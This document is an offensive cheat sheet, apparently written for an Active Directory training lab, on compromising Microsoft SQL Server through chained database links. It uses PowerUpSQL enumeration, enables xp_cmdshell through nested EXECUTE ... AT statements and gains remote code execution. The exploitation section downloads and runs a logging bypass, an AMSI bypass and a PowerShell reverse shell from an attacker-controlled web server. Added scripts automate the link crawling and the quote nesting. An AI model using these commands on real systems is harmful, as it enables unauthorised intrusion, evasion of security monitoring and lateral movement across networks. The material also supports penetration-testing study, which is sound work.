MSSQL Servers
Concepts
- MSSQL Servers: Microsoft SQL Server instances that may be exposed within an Active Directory environment, often misconfigured with excessive privileges or reachable via domain accounts.
- Database Links: Trusted connections between SQL Server instances that allow query execution on remote servers. These links may run under privileged accounts (e.g., sa), enabling lateral movement and cross-domain pivoting through SQL chains.
Workflow
1. Discover accessible SQL instances in the domain (Get-SQLInstanceDomain)
↓
2. Check current privileges on the instance (public? sysadmin?)
↓
3. Enumerate Database Links from the current instance (Get-SQLServerLink)
↓
4. Crawl the full link chain looking for sysadmin privileges at any hop
↓
5. Enable xp_cmdshell on the sysadmin-level server to allow OS command execution
↓
6. RCE → reverse shell → lateral movement / cross-domain pivot
Enumeration
# Import PowerUpSQL module into current session
. .\PowerUpSQL.ps1
# Discover all SQL Server instances registered in the domain via SPN enumeration
Get-SQLInstanceDomain
# Test connectivity and authentication against the discovered instances (threaded for speed)
# The cmdlet needs instances as input, so pipe the SPN results into it
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
# List all Database Links configured on a specific instance
# Links may use different credentials and privilege levels than your current user
# Note the RemoteLoginName (who you become on the remote side) and is_rpc_out_enabled:
# RPC Out must be enabled on a link for EXECUTE ... AT to work through it
Get-SQLServerLink -Instance <instance> -Verbose
# Automatically crawl all chained linked servers recursively
# Shows the full path, login used at each hop, and whether that login has sysadmin
Get-SQLServerLinkCrawl -Instance <instance> -Verbose
# Retrieve detailed SQL Server info (version, hostname, service account, etc.)
# Also reports CurrentLogin and IsSysadmin, which covers workflow step 2 for each accessible instance
Get-SQLInstanceDomain | Get-SQLServerInfo
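The individual commands above are usually chained into one triage pass: find the instances, keep the ones we can authenticate to, record our privilege level and the outbound links on each, then crawl only the instances that actually have links. The script below is an added example, not part of the original notes or of PowerUpSQL itself; it assumes PowerUpSQL.ps1 is already dot-sourced and that we are running as a domain user. The property names it reads (Status, CurrentLogin, IsSysadmin, ServiceAccount, DatabaseLinkName, RemoteLoginName, is_rpc_out_enabled, Sysadmin, User, Path) are those PowerUpSQL's cmdlets emit at the time of writing; if a PowerUpSQL version renames them, adjust the Select-Object calls.

```powershell
# Added example: one-pass triage of domain SQL instances with PowerUpSQL (not the original notes' code).
# Assumes PowerUpSQL.ps1 is dot-sourced and the session runs as a domain user.

# Step 1: SPN discovery -> threaded auth test -> keep only instances we can log in to
$accessible = Get-SQLInstanceDomain |
    Get-SQLConnectionTestThreaded -Threads 10 |
    Where-Object { $_.Status -eq 'Accessible' }

# Steps 2 and 3: for each accessible instance, record our privilege level and its outbound links
$triage = foreach ($target in $accessible) {
    $instance = $target.Instance

    # Get-SQLServerInfo reports the login we landed as and whether it is sysadmin
    $info = Get-SQLServerInfo -Instance $instance

    # Outbound links: who we become on the far side, and whether RPC Out is enabled
    # (EXECUTE ... AT through a link fails when rpc out is off)
    $links = @(Get-SQLServerLink -Instance $instance |
        Select-Object DatabaseLinkName, RemoteLoginName, is_rpc_out_enabled)

    [pscustomobject]@{
        Instance       = $instance
        ServiceAccount = $info.ServiceAccount
        CurrentLogin   = $info.CurrentLogin
        IsSysadmin     = $info.IsSysadmin
        LinkCount      = $links.Count
        Links          = ($links | ForEach-Object {
                             "$($_.DatabaseLinkName) as $($_.RemoteLoginName) [rpc_out=$($_.is_rpc_out_enabled)]"
                         }) -join '; '
    }
}

$triage | Format-Table -AutoSize

# Step 4: crawl only the instances that have links, and surface hops where the effective login is sysadmin
foreach ($t in ($triage | Where-Object { $_.LinkCount -gt 0 })) {
    Get-SQLServerLinkCrawl -Instance $t.Instance |
        Where-Object { $_.Sysadmin -eq 1 } |
        Select-Object Instance, User, @{ n = 'Path'; e = { $_.Path -join ' -> ' } }
}
```

Instances with a sysadmin hop somewhere in their crawl output are the candidates for the xp_cmdshell steps below; the rpc_out flag recorded per link tells you in advance whether EXECUTE ... AT will be usable on that hop or whether the link needs to be reconfigured first.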
Exploitation (RCE - Reverse Shell)
# Send a ping from the target SQL server back to your machine
Get-SQLServerLinkCrawl -Instance dcorp-mssql `
-Query 'exec master..xp_cmdshell ''ping 172.16.100.44 -n 1''' `
-QueryTarget eu-sql25 -Verbose
# Run whoami across the full chain; only hops where the effective login is sysadmin
# (and xp_cmdshell is enabled) return output, the rest error out
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local `
    -Query "exec master..xp_cmdshell 'whoami'" -Verbose
# Alternatively, print the USERNAME environment variable to confirm the account on each hop
# ('set username' lists every variable whose name starts with "username")
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local `
    -Query "exec master..xp_cmdshell 'set username'"
Create a copy of Invoke-PowerShellTcpEx.ps1 and append the following line at the end, so the reverse shell starts as soon as the script is loaded with iex (start a listener on port 443 on your host first):
Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.x -Port 443
# Fetch the logging bypass, the AMSI bypass and the modified script from your web server in that order,
# then run the whole thing on the target hop via xp_cmdshell
Get-SQLServerLinkCrawl -Instance dcorp-mssql `
    -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.x/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.x/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.x/Invoke-PowerShellTcpEx.ps1)"''' `
    -QueryTarget eu-sqlx
Enable xp_cmdshell (if disabled on the target)
-- Run these from the server directly before [remote_server] in the chain (e.g. via -Query / -QueryTarget)
-- EXECUTE ... AT needs 'rpc out' enabled on the link; OPENQUERY does not, but it cannot run sp_configure/RECONFIGURE
-- The remote login must be sysadmin (or hold ALTER SETTINGS) for sp_configure to succeed
-- Step 1: Enable 'show advanced options' to expose sp_configure settings
EXECUTE('sp_configure ''show advanced options'', 1; RECONFIGURE') AT [remote_server]
-- Step 2: Enable xp_cmdshell to allow OS command execution from SQL
EXECUTE('sp_configure ''xp_cmdshell'', 1; RECONFIGURE') AT [remote_server]
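When the sysadmin hop is more than one link away, the EXECUTE ... AT statement has to be nested once per hop, and every nesting level doubles the single quotes of the level inside it. That quoting is what Get-SQLServerLinkCrawl -QueryTarget does for you; the function below reproduces it by hand so the generated T-SQL can be inspected or sent with plain Get-SQLQuery. This is an added example, not code from the original notes or from PowerUpSQL: New-LinkedQuery, the $path link names and the instance name are hypothetical, and the only PowerUpSQL cmdlet it relies on is Get-SQLQuery. It requires 'rpc out' on every link in the path.

```powershell
# Added example: build the nested EXECUTE ... AT statement for an arbitrary link path,
# then use it to check privileges, enable xp_cmdshell and run a command on the last hop.
# Not the original notes' code; New-LinkedQuery, $path and the host names are hypothetical.

function New-LinkedQuery {
    param(
        [Parameter(Mandatory)] [string]   $Query,   # T-SQL to run on the final hop
        [Parameter(Mandatory)] [string[]] $Path     # link names, in order, starting from the server we query
    )
    $wrapped = $Query
    # Wrap from the innermost hop outward; each level must double the quotes of the level inside it
    for ($i = $Path.Count - 1; $i -ge 0; $i--) {
        $escaped = $wrapped -replace "'", "''"
        $wrapped = "EXECUTE('$escaped') AT [$($Path[$i])]"
    }
    return $wrapped
}

$instance = 'dcorp-mssql.dollarcorp.moneycorp.local'   # server we authenticate to directly
$path     = @('dcorp-sql1', 'dcorp-mgmt', 'eu-sql')    # hypothetical chain taken from a link crawl

# 1. Confirm the effective login on the last hop before touching sp_configure
$check = New-LinkedQuery -Path $path -Query "SELECT SYSTEM_USER AS login, IS_SRVROLEMEMBER('sysadmin') AS sysadmin"
Get-SQLQuery -Instance $instance -Query $check

# 2. Enable xp_cmdshell on the last hop (only proceed if the check returned sysadmin = 1)
foreach ($step in @("sp_configure 'show advanced options', 1; RECONFIGURE",
                    "sp_configure 'xp_cmdshell', 1; RECONFIGURE")) {
    Get-SQLQuery -Instance $instance -Query (New-LinkedQuery -Path $path -Query $step)
}

# 3. Run an OS command on the last hop; the result set comes back through every link
$cmd = New-LinkedQuery -Path $path -Query "EXEC master..xp_cmdshell 'whoami'"
Get-SQLQuery -Instance $instance -Query $cmd

# For a two-hop path @('hop1','hop2') the generated statement is:
# EXECUTE('EXECUTE(''EXEC master..xp_cmdshell ''''whoami'''''') AT [hop2]') AT [hop1]
```

Because each hop's EXECUTE runs under that link's remote login, the privilege check in step 1 is about the last hop only; a link further along the chain can be sysadmin even when the first hop is not, which is exactly why the crawl is worth running before picking a -QueryTarget.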